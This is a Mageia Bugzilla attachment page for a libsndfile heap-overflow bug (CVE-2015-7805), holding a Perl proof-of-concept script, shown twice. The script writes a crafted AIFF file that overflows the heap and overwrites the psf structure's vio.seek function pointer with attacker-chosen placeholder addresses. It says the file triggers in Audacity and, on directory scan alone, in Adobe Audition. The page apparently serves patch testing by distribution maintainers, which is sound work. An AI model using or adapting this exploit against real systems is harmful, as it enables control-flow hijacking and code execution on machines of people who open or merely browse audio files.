Mageia Bugzilla – Attachment 7219 Details for
Bug 17163
libsndfile new security issues CVE-2015-7805 and CVE-2015-8075
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Perl script for PoC
poc.pl (text/plain), 4.54 KB, created by
Len Lawrence
on 2015-11-20 01:14:07 CET
(
hide
)
Description:
Perl script for PoC
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2015-11-20 01:14:07 CET
Size:
4.54 KB
patch
obsolete
>my $header_aiff_c = "\x46\x4F\x52\x4D" . ### FORM and VERSION > "\x00\x00\xD0\x7C" . > "\x41\x49\x46\x43" . > "\x42\x56\x45\x52" . > "\x00\x00\x00\x04" . > "\xA2\x80\x51\x40" . > "\x43\x4F\x4D\x4D" . ### COMM Chunk and Compression NONE (PCM) > "\x00\x00\x00\x11" . > "\x00\x01\x00\x00" . > "\x00\x00\x00\x10" . > "\xF3\x0C\xFA\x00" . > "\x00\x00\x00\x00" . > "\x00\x00\x4E\x4F" . > "\x4E\x45\x0E\x6E" . > "\x6F\x74\x20\x63" . > "\x63\x6D\x92\x72" . > "\x65\x73\x53\x65\x64\x00" . > "\x53\x53\x4E\x44" . ### 2 SSND Chunks > "\x00\x00\x00\x40" . > "\x00\x00\x00\xAA" . > "\xBD\xBD\xC5\x58" . > "\xBD\x96\xCA\xB0" . > "\xE9\x6F\x0A\xFE" . > "\x24\xCD\x26\x65" . > "\x73\x73\x65\x64" . > "\x00\x53\x53\x4E" . > "\x44\x00\x00\x00" . > "\x40\x00\x00\x00" . > "\x00\xF8\x72\xF3" . > "\x59\xFB\x56\xFE" . > "\x00\x00\x00\x3E" . > "\xE9\x22\x66\x94" . > "\x4E\x66\x55\x94" . > "\x4E\xD4\xD7\xC5" . > "\x42\x49\x61\xC4" . > "\x43\x4F\x4D\x54" . ### 2 COMT Chunks > "\x00\x00\x00\x26" . > "\x00\x01\x00\x20" . > "\x68\x17\x0C\x10" . > "\x25\x03\x00\x10" . ### 0x2503 items > "\x03\x80\xFF\x37" . > "\x52\x00\x00\x00" . > "\x04\xA2\x8E\x51" . > "\x40\x43\x4F\x4D" . > "\x54\x00\x00\x0B" . > "\x26\x00\x01\x00" . > "\x20\x68" . > "\x17\x00\x10\x03" . ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff.c) > "\x03\x00\x10\x1B" . > "\x80\xFF\xFF\x4F" . > "\x4E\x45\x1F\x6E" . ### my debug: heap 0x161e0d8 > "\x6F\x00\x01\x00" . ### my debug: heap 0x161e0dc > "\x00\xE4\x7F\x72" . ### ... > "\x00\x00\x00\xD7" . > "\xBA\x17\xFF\xE3" . > "\x1F\x40\xFF\x20" . > "\x18\x08\xDD\x18" . > "\x00\x28\x00\x28" . > "\x00\x28\x40\x28" . > "\x00\x28\x00\x28" . > "\x00\x28\xFF\xFF" . > "\xFF\x80\xF7\x17" . > "\x00\x18\x01\x00" . > "\x20\x68\x17\x0C" . > "\x10\x03\x03\x00" . > "\x10\x03\x80\xFF" . > "\xFF\x4F\x4E\x45" . > "\x0A\x6E\x70\x00" . > "\x18\xDE\x3A\x08" . > "\x00\x18\x21\xA6" . > "\x05\x7F\x40\x00" . > "\x08\xFF\x5D\x00" . > "\xF0\x00\x4F\x00" . > "\x6A\xFF\x89\x9D" . > "\xDA\x07\xB6\xFF" . > "\x2C\x92\xB3\x0D" . > "\xE4\x40\xBB\x23" . > "\x00\x18\x00\x38" . > "\x00\x63\x00\x28" . > "\x00\x90\xFF\xFF" . > "\x20\x18\x08\xDD" . > "\x18\x00\x28\x00" . > "\x28\x00\x5E\xFC" . > "\x78\xD9\xAD\xCD" . > "\x9E\x3E\xE9\x21" . > "\x55\x94\x4E\x85" . > "\x51\x94\x4E\xA6" . > "\xD7\xC5\x42\xA7" . > "\x2A\x55\xC4\x9F" . > "\x43\x4F\x4D\x54" . ### here start next COMT Chunk with 0x36B0 items > "\x08\x00\x00\x26" . > "\x00\x01\x00\x20" . > "\x68\x17\x0C\xDD" . > "\x36\xB0"; #### end of header... > >my $file= "nemux.aiff"; > >if ($ARGV[0] eq "h" || $ARGV[0] eq "help") { > print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n"; > print "[*] Heap overflow vulnerability\n"; > print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015 \n"; > print "\n Just run " . $0 . " (output will be \"nemux.aiff\" file)\n\n"; > exit 0; >} > >my $eax_addr = 0x41414141; >my $edx_addr = 0x44444444; > >##### >#### We are going to overwirte psf structure allocated in the heap >##### > >my $content_file = pack('Q', $eax_addr); >$content_file .= "\x90" x ( 21146 - length pack('Q',$eax_addr) ); > >##### >### In the psf structure we will overwrite "int virtual_io" with a true value, and vio.seek function pointer >### with an arbitrary address. >### in this way the block below will be triggred in file_io.c: >### ... >### if (psf->virtual_io) >### return psf->vio.seek (...); >### >##### >my $rax_overwrite = pack('Q',$eax_addr); ### overwrite vio.seek pointer here >my $padding = "\x43" x 24; ### .... >my $rdx_overwrite = pack('Q',$edx_addr); ### overwrite rdx here ... >my $padding_end_file = "MOMIMANHACKERNOW" x 7; ### not useful but funny... -_- > >print "\n[*] Making AIFF file: \"nemux.aiff\""; >my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file; >print "\n[*] Done... AIFF File Size: ".length($payload)."\n"; >print "\nIs it over? ... Hello? ... Did we win? (cit.)\n"; > >open($FILE,">$file"); >print $FILE $payload; >close($FILE); > >print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity namux.aiff\n"; >print "[+] You can test it on OSX Windows and Linux - with Adobe Audition"; >print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n\n"; >print "Marco Romano \@nemux_\n\n";
my $header_aiff_c = "\x46\x4F\x52\x4D" . ### FORM and VERSION "\x00\x00\xD0\x7C" . "\x41\x49\x46\x43" . "\x42\x56\x45\x52" . "\x00\x00\x00\x04" . "\xA2\x80\x51\x40" . "\x43\x4F\x4D\x4D" . ### COMM Chunk and Compression NONE (PCM) "\x00\x00\x00\x11" . "\x00\x01\x00\x00" . "\x00\x00\x00\x10" . "\xF3\x0C\xFA\x00" . "\x00\x00\x00\x00" . "\x00\x00\x4E\x4F" . "\x4E\x45\x0E\x6E" . "\x6F\x74\x20\x63" . "\x63\x6D\x92\x72" . "\x65\x73\x53\x65\x64\x00" . "\x53\x53\x4E\x44" . ### 2 SSND Chunks "\x00\x00\x00\x40" . "\x00\x00\x00\xAA" . "\xBD\xBD\xC5\x58" . "\xBD\x96\xCA\xB0" . "\xE9\x6F\x0A\xFE" . "\x24\xCD\x26\x65" . "\x73\x73\x65\x64" . "\x00\x53\x53\x4E" . "\x44\x00\x00\x00" . "\x40\x00\x00\x00" . "\x00\xF8\x72\xF3" . "\x59\xFB\x56\xFE" . "\x00\x00\x00\x3E" . "\xE9\x22\x66\x94" . "\x4E\x66\x55\x94" . "\x4E\xD4\xD7\xC5" . "\x42\x49\x61\xC4" . "\x43\x4F\x4D\x54" . ### 2 COMT Chunks "\x00\x00\x00\x26" . "\x00\x01\x00\x20" . "\x68\x17\x0C\x10" . "\x25\x03\x00\x10" . ### 0x2503 items "\x03\x80\xFF\x37" . "\x52\x00\x00\x00" . "\x04\xA2\x8E\x51" . "\x40\x43\x4F\x4D" . "\x54\x00\x00\x0B" . "\x26\x00\x01\x00" . "\x20\x68" . "\x17\x00\x10\x03" . ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff.c) "\x03\x00\x10\x1B" . "\x80\xFF\xFF\x4F" . "\x4E\x45\x1F\x6E" . ### my debug: heap 0x161e0d8 "\x6F\x00\x01\x00" . ### my debug: heap 0x161e0dc "\x00\xE4\x7F\x72" . ### ... "\x00\x00\x00\xD7" . "\xBA\x17\xFF\xE3" . "\x1F\x40\xFF\x20" . "\x18\x08\xDD\x18" . "\x00\x28\x00\x28" . "\x00\x28\x40\x28" . "\x00\x28\x00\x28" . "\x00\x28\xFF\xFF" . "\xFF\x80\xF7\x17" . "\x00\x18\x01\x00" . "\x20\x68\x17\x0C" . "\x10\x03\x03\x00" . "\x10\x03\x80\xFF" . "\xFF\x4F\x4E\x45" . "\x0A\x6E\x70\x00" . "\x18\xDE\x3A\x08" . "\x00\x18\x21\xA6" . "\x05\x7F\x40\x00" . "\x08\xFF\x5D\x00" . "\xF0\x00\x4F\x00" . "\x6A\xFF\x89\x9D" . "\xDA\x07\xB6\xFF" . "\x2C\x92\xB3\x0D" . "\xE4\x40\xBB\x23" . "\x00\x18\x00\x38" . "\x00\x63\x00\x28" . "\x00\x90\xFF\xFF" . "\x20\x18\x08\xDD" . "\x18\x00\x28\x00" . "\x28\x00\x5E\xFC" . "\x78\xD9\xAD\xCD" . "\x9E\x3E\xE9\x21" . "\x55\x94\x4E\x85" . "\x51\x94\x4E\xA6" . "\xD7\xC5\x42\xA7" . "\x2A\x55\xC4\x9F" . "\x43\x4F\x4D\x54" . ### here start next COMT Chunk with 0x36B0 items "\x08\x00\x00\x26" . "\x00\x01\x00\x20" . "\x68\x17\x0C\xDD" . "\x36\xB0"; #### end of header... my $file= "nemux.aiff"; if ($ARGV[0] eq "h" || $ARGV[0] eq "help") { print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n"; print "[*] Heap overflow vulnerability\n"; print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015 \n"; print "\n Just run " . $0 . " (output will be \"nemux.aiff\" file)\n\n"; exit 0; } my $eax_addr = 0x41414141; my $edx_addr = 0x44444444; ##### #### We are going to overwirte psf structure allocated in the heap ##### my $content_file = pack('Q', $eax_addr); $content_file .= "\x90" x ( 21146 - length pack('Q',$eax_addr) ); ##### ### In the psf structure we will overwrite "int virtual_io" with a true value, and vio.seek function pointer ### with an arbitrary address. ### in this way the block below will be triggred in file_io.c: ### ... ### if (psf->virtual_io) ### return psf->vio.seek (...); ### ##### my $rax_overwrite = pack('Q',$eax_addr); ### overwrite vio.seek pointer here my $padding = "\x43" x 24; ### .... my $rdx_overwrite = pack('Q',$edx_addr); ### overwrite rdx here ... my $padding_end_file = "MOMIMANHACKERNOW" x 7; ### not useful but funny... -_- print "\n[*] Making AIFF file: \"nemux.aiff\""; my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file; print "\n[*] Done... AIFF File Size: ".length($payload)."\n"; print "\nIs it over? ... Hello? ... Did we win? (cit.)\n"; open($FILE,">$file"); print $FILE $payload; close($FILE); print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity namux.aiff\n"; print "[+] You can test it on OSX Windows and Linux - with Adobe Audition"; print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n\n"; print "Marco Romano \@nemux_\n\n";
View Attachment As Raw
Actions:
View
Attachments on
bug 17163
: 7219 |
7220